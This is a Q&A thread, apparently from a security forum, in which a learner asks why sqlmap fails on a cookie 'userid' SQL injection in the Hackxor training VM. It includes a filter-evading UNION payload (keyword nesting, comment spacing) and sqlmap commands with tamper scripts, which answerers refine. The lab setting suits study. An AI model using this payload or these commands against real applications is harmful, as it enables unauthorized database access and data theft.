6

Right now I'm tinkering with the Hackxor VM (a pentesting training enviroment) and I'm trying to use sqlmap to exploit a vulnerability which I can exploit manually.

The vulnerability is in the cookie header 'userid' parameter. The application implements some SQLi filter to block spaces and some SQL keywords so you have to convolute a bit the payload.

I can successfuly exploit the vulnerability injecting the following payload in the mentioned 'userid' parameter with an HTTP proxy:

71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users

Then I tried to replicate the injection with sqlmap to no success with the following command:

sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" -p "userid" --level 5 --tamper "nonrecursivereplacement.py,space2comment.py" --sql-query="71934 UNION SELECT * from users"

I expected sqlmap to inject only the given query and return a successful exploit, but sqlmap tries a lot of queries and at the end returns the 'userid' parameter not being vulnerable.

What am I doing wrong?

Hidden
  • 161
  • 1
  • 3

2 Answers2

1

I actually ran into a similar issue. I though my syntax was correct and I still don't know where I went wrong but I was able to use the -r flag and feed sqlmap a captured HTTP header as a parameter. Once I did this sqlmap identified the field as vulnerable (which I already knew it was) and acted as I initially thought it would.

SQLmap POST parameter 'txtLoginID' is not injectable

Hope this helps!

Community
  • 1
Grady Negronida
  • 53
  • 1
  • 1
  • 7
1

It needs to work this way

sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" --level 5 --risk 3 -p "userid" --tamper=nonrecursivereplacement,space2comment --sql-query="71934 UNION SELECT * from users"
ugur.ercan
  • 11
  • 1